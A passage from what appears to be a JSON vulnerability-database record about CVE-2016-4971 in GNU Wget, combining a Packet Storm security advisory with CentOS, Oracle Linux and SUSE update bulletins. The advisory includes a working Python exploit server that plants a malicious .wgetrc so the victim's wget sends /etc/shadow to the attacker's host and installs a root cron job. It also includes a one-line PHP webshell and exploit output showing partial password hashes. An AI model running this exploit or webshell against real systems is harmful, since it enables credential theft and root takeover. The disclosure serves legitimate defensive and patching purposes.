"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:23", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "href": "https://packetstormsecurity.com/files/137795/GNU-Wget-Arbitrary-File-Upload-Potential-Remote-Code-Execution.html", "id": "PACKETSTORM:137795", "type": "packetstorm", "title": "GNU Wget Arbitrary File Upload / Potential Remote Code Execution", "sourceData": "`============================================= \n- Release date: 06.07.2016 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE-2016-4971 \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Arbitrary File Upload / Potential RCE \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc. \nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nIV. DESCRIPTION \n------------------------- \n \nBecause of lack of sufficient controls in wget, when user downloads a file \nwith wget, such as: \n \nwget http://attackers-server/safe_file.txt \n \nan attacker who controls the server could make wget create an arbitrary file \nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining FTP server reference in response to the victim's wget request. \n \nFor example, if the attacker's server replies with the following response: \n \nHTTP/1.1 302 Found \nCache-Control: private \nContent-Type: text/html; charset=UTF-8 \nLocation: ftp://attackers-server/.bash_profile \nContent-Length: 262 \nServer: Apache \n \nwget will automatically follow the redirect and will download a malicious \n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n \nBecause of this vulnerability, an attacker is able to upload an arbitrary file \nwith an arbitrary filename to the victim's current directory. \n \nExecution flow: \n \nvictim@trusty:~$ wget --version | head -n1 \nGNU Wget 1.17 built on linux-gnu. \n \nvictim@trusty:~$ pwd \n/home/victim \n \nvictim@trusty:~$ ls \nvictim@trusty:~$ \n \nvictim@trusty:~$ wget http://attackers-server/safe-file.txt \nResolving attackers-server... 192.168.57.1 \nConnecting to attackers-server|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 302 Found \nLocation: ftp://192.168.57.1/.bash_profile [following] \n=> \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 \nConnecting to 192.168.57.1:21... connected. \nLogging in as anonymous ... Logged in! \n==> SYST ... done. ==> PWD ... done. \n==> TYPE I ... done. ==> CWD not needed. \n==> SIZE .bash_profile ... 55 \n==> PASV ... done. ==> RETR .bash_profile ... done. \nLength: 55 (unauthoritative) \n \n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s \n \n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55] \n \n \nvictim@trusty:~$ ls -l \ntotal 4 \n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile \nvictim@trusty:~$ \n \n \nThis vulnerability will not work if extra options that force destination \nfilename are specified as a paramter. Such as: -O /tmp/output \nIt is however possible to exploit the issue with mirroring/recursive options \nenabled such as -r or -m. \n \nAnother limitation is that attacker exploiting this vulnerability can only \nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option). \nThis could however be enough to exploit wget run from home directory, or \nwithin web document root (in which case attacker could write malicious php files \nor .bash_profile files). \n \nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory. \n \nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget \nsettings such as destination directory for all downloaded files in future, \nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses. \n \n \nHere is a set of Wget settings that can be helpful to an attacker: \n \ndir_prefix = string \nTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122. \n \npost_file = file \nUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122. \n \nrecursive = on/off \nRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122. \n \ntimestamping = on/off \nAllows to overwrite existing files. \n \ncut_dirs = n \nIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). \n \nhttp_proxy \nHTTP Proxy server \n \nhttps_proxy \nHTTPS Proxy server \n \noutput_document = file \nSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122. \n \ninput = file \nRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122. \n \nmetalink-over-http \nIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \nThen it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. \n \n \n \nFull list of .wgetrc options can be found in: \n \nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands \n \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n1) Cronjob with wget scenario \n \nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner. \nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. \nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs: \n \nhttps://codex.wordpress.org/Post_to_your_blog_using_email \nhttps://docs.moodle.org/2x/ca/Cron \nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site \nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel \n \nSuch setup could be abused by attackers to upload .bash_profile file through \nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n \nAs cron runs priodically attackers, could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution. \n \n \nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests. \n \nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. \nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n \nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root. \n \n \nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget. \n \nThe root cronjob on the victim server may look as follows: \n \nroot@victim:~# cat /etc/cron.d/update-database \n# Update database file every 2 minutes \n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 \n \n \nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server: \n \nattackers-server# mkdir /tmp/ftptest \nattackers-server# cd /tmp/ftptest \n \nattackers-server# cat <<_EOF_>.wgetrc \npost_file = /etc/shadow \noutput_document = /etc/cron.d/wget-root-shell \n_EOF_ \n \nattackers-server# sudo pip install pyftpdlib \nattackers-server# python -m pyftpdlib -p21 -w \n \n \nAt this point attacker can start an HTTP server which will exploit wget by \nsending malicious redirects to the victim wget's requests: \n \n---[ wget-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget 1.18 < Arbitrary File Upload Exploit \n# Dawid Golunski \n# dawid( at )legalhackers.com \n# \n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n# \n# CVE-2016-4971 \n# \n \nimport SimpleHTTPServer \nimport SocketServer \nimport socket; \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_GET(self): \n# This takes care of sending .wgetrc \n \nprint \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nprint \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\" \nself.send_response(301) \nnew_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) \nprint \"Sending redirect to %s \\n\"%(new_path) \nself.send_header('Location', new_path) \nself.end_headers() \n \ndef do_POST(self): \n# In here we will receive extracted file and install a PoC cronjob \n \nprint \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \ncontent_len = int(self.headers.getheader('content-length', 0)) \npost_body = self.rfile.read(content_len) \nprint \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body) \n \nprint \"Sending back a cronjob script as a thank-you for the file...\" \nprint \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\" \nself.send_response(200) \nself.send_header('Content-type', 'text/plain') \nself.end_headers() \nself.wfile.write(ROOT_CRON) \n \nprint \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\" \n \nreturn \n \nHTTP_LISTEN_IP = '192.168.57.1' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.57.1' \nFTP_PORT = 21 \n \nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\" \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"Ready? Is your FTP server running?\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT) \nelse: \nprint \"FTP is down :( Exiting.\" \nexit(1) \n \nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n---[ eof ]--- \n \n \n \nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes \nthe aforementioned cronjob with wget. \n \nThe output should look similar to: \n \n \n---[ wget-exploit.py output ]--- \n \nattackers-server# python ./wget-exploit.py \n \nReady? Is your FTP server running? \nFTP found open on 192.168.57.1:21. Let's go then \n \nServing wget exploit on port 80... \n \n \nWe have a volunteer requesting /database.db by GET :) \n \nUploading .wgetrc via ftp redirect vuln. It should land in /root \n \n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 - \nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n \nWe have a volunteer requesting /database.db by POST :) \n \nReceived POST from wget, this should be the extracted /etc/shadow file: \n \n---[begin]--- \nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: \ndaemon:*:16484:0:99999:7::: \nbin:*:16484:0:99999:7::: \nsys:*:16484:0:99999:7::: \nsync:*:16484:0:99999:7::: \ngames:*:16484:0:99999:7::: \nman:*:16484:0:99999:7::: \nlp:*:16484:0:99999:7::: \n...cut... \n---[eof]--- \n \nSending back a cronjob script as a thank-you for the file... \nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) \n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 - \n \nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n \n---[ output eof ]--- \n \n \nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file \nsetting to /etc/shadow. \nTherefore, on the next wget run, wget sent back shadow file to the attacker. \nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver: \n \n \nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n \nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root) \n \n \n \n2) PHP web application scenario \n \nIf wget is used within a PHP script e.g.: \n \n<?php \n \n// Update geoip data \n \nsystem(\"wget -N -P geoip http://attackers-host/goeip.db\"); \n \n?> \n \nAn attacker who manages to respond to the request could simply upload a PHP \nbackdoor of: \n \n<?php \n//webshell.php \n \nsystem($_GET['cmd']); \n?> \n \nby using the wget-exploit script described in example 1. \n \nAfter the upload he could simply execute the script and their shell \ncommand by a GET request to: \n \nhttp://victims-php-host/geoip/webshell.php?cmd=id \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or \neven path (if wget is run from a home directory). \nDepending on the context in which wget is used, this could lead to \nuploading a web shell and granting the attacker access remote access to the \nsystem, or privilege escalation. It could be possible for attackers to escalate \nto root user if wget is run via root cronjob as it is often the case in web \napplication deployments and is recommended in some guides on the Internet. \n \nThe vulnerability could also be exploited by well-positioned attackers within \nthe networ who are able to intercept/modify the network traffic. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nAll versions of Wget before the patched version of 1.18 are affected. \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to wget version 1.18 as advertised by the vendor at: \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nLinux distributions should update their wget packages. It is recommended \nto update wget manually if an updated package is not available for your \ndistribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nhttp://www.ubuntu.com/usn/usn-3012-1/ \n \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n06.07.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137795/wget-fileuploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:28:04", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2016:2587\n\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2016-November/003557.html\n\n**Affected packages:**\nwget\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2587.html", "modified": "2016-11-25T15:51:17", "published": "2016-11-25T15:51:17", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2016-November/003557.html", "id": "CESA-2016:2587", "title": "wget security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:34", "bulletinFamily": "unix", "description": "[1.14-13]\n- Fix CVE-2016-4971 (#1345778)\n- Added support for non-ASCII URLs (Related: CVE-2016-4971)\n[1.14-12]\n- Fix wget to include Host header on CONNECT as required by HTTP 1.1 (#1203384)\n- Run internal test suite during build (#1295846)\n- Fix -nv being documented as synonym for two options (#1147572)\n[1.14-11]\n- Fix CVE-2014-4877 wget: FTP symlink arbitrary filesystem access (#1156136)", "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-2587", "href": "http://linux.oracle.com/errata/ELSA-2016-2587.html", "title": "wget security and bug fix update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-11T05:54:19", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise Server 12 container image has been updated to\n include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 are now included in the base\n image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n util-linux:\n\n - CVE-2015-5218\n - CVE-2016-5011\n - CVE-2017-2616\n\n cracklib:\n\n - CVE-2016-6318\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - openldap2\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - shadow\n - zypper\n\n", "modified": "2017-10-11T03:06:53", "published": "2017-10-11T03:06:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html", "id": "SUSE-SU-2017:2699-1", "title": "Security update for SLES 12 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-11T05:54:20", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise Server 12 SP1 container image has been updated\n to include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 SP1 are now included in the\n base image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n expat:\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n - CVE-2016-7056\n - CVE-2016-8610\n - CVE-2017-3731\n\n cracklib:\n\n - CVE-2016-6318\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n util-linux:\n\n - CVE-2016-5011\n - CVE-2017-2616\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n update-alternatives:\n\n - CVE-2015-0860\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - lua51\n - lvm2\n - netcfg\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - sg3_utils\n - shadow\n - zypper\n\n", "modified": "2017-10-11T03:07:32", "published": "2017-10-11T03:07:32", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html", "id": "SUSE-SU-2017:2700-1", "title": "Security update for SLES 12-SP1 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}